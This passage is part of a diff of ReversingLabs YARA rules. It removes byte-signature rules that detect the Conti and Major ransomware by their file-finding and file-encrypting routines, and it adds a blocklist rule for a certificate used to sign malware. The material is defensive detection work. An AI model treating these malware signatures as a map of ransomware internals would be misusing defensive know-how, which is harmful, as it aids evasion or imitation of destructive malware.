= "Conti" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B D9 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? - 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 44 - 24 ?? B9 ?? ?? ?? ?? 53 BE ?? ?? ?? ?? 57 66 83 7C 43 ?? ?? 0F 45 F1 FF 15 ?? ?? ?? - ?? 56 57 FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? - 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B - CB E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B CE E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB ?? - 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B CB E8 ?? ?? ?? ?? 8B F0 85 F6 - 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 5A 8B C8 C6 01 ?? 41 - 83 EA ?? 75 ?? 83 48 ?? ?? 50 89 70 ?? A1 ?? ?? ?? ?? 52 6A ?? FF 70 ?? FF 15 ?? ?? - ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? E8 ?? - ?? ?? ?? 83 FF ?? 74 ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BB ?? ?? ?? ?? 8B F9 53 57 FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - A1 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 75 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? FF 74 B5 ?? 57 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 46 83 FE ?? 7C ?? 33 C0 40 EB ?? 85 C0 75 ?? 8B 35 ?? ?? ?? ?? BB ?? - ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 53 56 FF 15 ?? - ?? ?? ?? 85 C0 74 ?? 2B C6 D1 F8 74 ?? 85 C0 78 ?? 40 50 56 8D 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 56 FF 15 ?? - ?? ?? ?? 8B F0 85 F6 74 ?? 83 C6 ?? EB ?? 33 C0 5F 5E 5B C9 C3 - } - $encrypt_files_p2 = { - 55 8B EC 83 EC ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB 53 FF 15 ?? ?? - ?? ?? 8B F8 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 5E 56 68 ?? ?? ?? - ?? 53 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 - 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 - ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 53 53 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A - ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? 85 C0 75 - ?? 6A ?? FF 15 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 4D ?? - 8B D7 FF 75 ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? - 8B 45 ?? B9 ?? ?? ?? ?? 83 48 ?? ?? 8B 45 ?? 8B 58 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 - ?? 53 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? - ?? 8B CE E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 49 ?? E8 ?? ?? ?? ?? FF - 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? FF - 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B C9 C2 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Abdulkadir \\xC5\\x9Eahin" and (pe.signatures[i].serial=="00:f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" or pe.signatures[i].serial=="f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75") and 1545004800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Major : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE { meta: - description = "Yara rule that detects Major ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0c85aff8-1fb5-5e47-ae49-72445a000eaa" - date = "2021-01-26" - modified = "2021-01-26" + id = "e71d575c-5a30-5158-80ee-3508cdaf5636" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Major.yara#L1-L261" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "16fb7763e3806fca6937fef7e8b3d8bccd61cb39549061d359d630c7d266c270" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12610-L12626" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "030bb847e524e672ee382e0284ba3f027920f60c70bbd153d4b9cdd2669e6a99" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Major" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 C0 89 4D ?? 57 50 66 89 45 ?? 8D 8D ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 - ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 - 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 33 C9 8B F8 51 89 4D ?? 51 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? - 8D 45 ?? 50 FF 77 ?? 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 47 ?? 89 4D ?? BB ?? ?? ?? - ?? 8B 48 ?? 89 01 8B 07 8D 4D ?? 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 45 ?? 3B C6 - } - $find_files_p2 = { - 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? - ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? - ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? - ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 7E ?? - ?? 73 ?? 8B 46 ?? 83 C0 ?? 74 ?? 03 C0 50 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB - ?? 8B 06 89 45 ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 89 45 ?? 8B 46 ?? 89 45 ?? C7 46 ?? ?? - ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 66 89 06 8B 45 ?? 83 F8 - ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 - C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? - ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 3F 8D 77 ?? 8B - 4F ?? 8B 07 89 01 8B 0F 8B 47 ?? 89 41 ?? 8B 45 ?? 48 89 45 ?? 89 45 ?? 8B 46 ?? 83 - F8 ?? 72 ?? 8B 0E 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 - } - $find_files_p3 = { - C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? - ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? - ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 57 66 89 06 E8 ?? ?? ?? ?? 83 - C4 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B - F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 66 66 66 0F 1F 84 00 ?? ?? ?? ?? 33 C0 C7 45 - ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 0F 84 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 8B 08 85 C9 74 ?? 8B 85 ?? ?? ?? ?? 8B 00 8D 14 41 EB ?? 8B 85 - ?? ?? ?? ?? 8B 08 8B 85 ?? ?? ?? ?? 8B 00 8D 14 48 8B 85 ?? ?? ?? ?? 8B 08 2B D1 D1 - FA 81 FA ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8D 04 12 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 - ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 - ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 50 89 85 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 - ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 - } - $find_files_p4 = { - 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? - 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 - ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 8B D4 33 C0 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 66 39 85 ?? ?? ?? - ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B - CE D1 F9 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? - ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 CB ?? C7 45 ?? - ?? ?? ?? ?? 66 89 45 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D - 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? - E8 ?? ?? ?? ?? 8D 45 ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 - 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - } - $find_files_p5 = { - 83 CB ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 85 ?? - ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 85 C0 74 ?? - C6 45 ?? ?? F6 C3 ?? 74 ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? - E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? F6 C3 ?? - 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 - 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? - ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? - ?? ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 - } - $find_files_p6 = { - C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 E3 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 - ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? - ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? - 89 55 ?? 89 01 E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? - 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 - ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? 89 55 ?? 89 55 ?? 89 01 8B 45 ?? 83 F8 ?? - 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 75 - ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 7D ?? - 8B CF E8 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 7D ?? E9 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F - 84 ?? ?? ?? ?? 0F 1F 00 8B 45 ?? 8D 4D ?? 8B 00 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 - } - $find_files_p7 = { - 8D 45 ?? 3B C6 74 ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8B C8 E8 ?? ?? ?? ?? 33 - C0 C7 45 ?? ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? - 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 75 - ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 00 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? - 6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF - 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 85 ?? ?? ?? ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 8B CC 50 0F 84 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8D 4D ?? FF 73 ?? 53 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 2B CE 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 46 8B 48 ?? 89 75 ?? 89 01 8B 45 ?? 83 F8 - ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 - ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B CF 50 E8 ?? ?? ?? ?? 8B - 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 F6 0F 85 ?? - ?? ?? ?? FF 75 ?? FF 15 - } - $encrypt_files_p1 = { - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 45 ?? 83 7D ?? ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? - ?? ?? ?? 6A ?? 50 66 89 45 ?? 8D 4D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F - 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 45 ?? FF 15 ?? ?? ?? - ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 8B 4D ?? 01 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 83 FA ?? 0F 8C ?? ?? - ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 66 0F 1F 84 00 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 - FF 74 ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A - } - $encrypt_files_p2 = { - 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? - 8B 55 ?? 8B 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 - ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? - ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? - ?? ?? 56 E9 ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? - ?? ?? 72 ?? 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F - 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 - 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B - 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 - ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 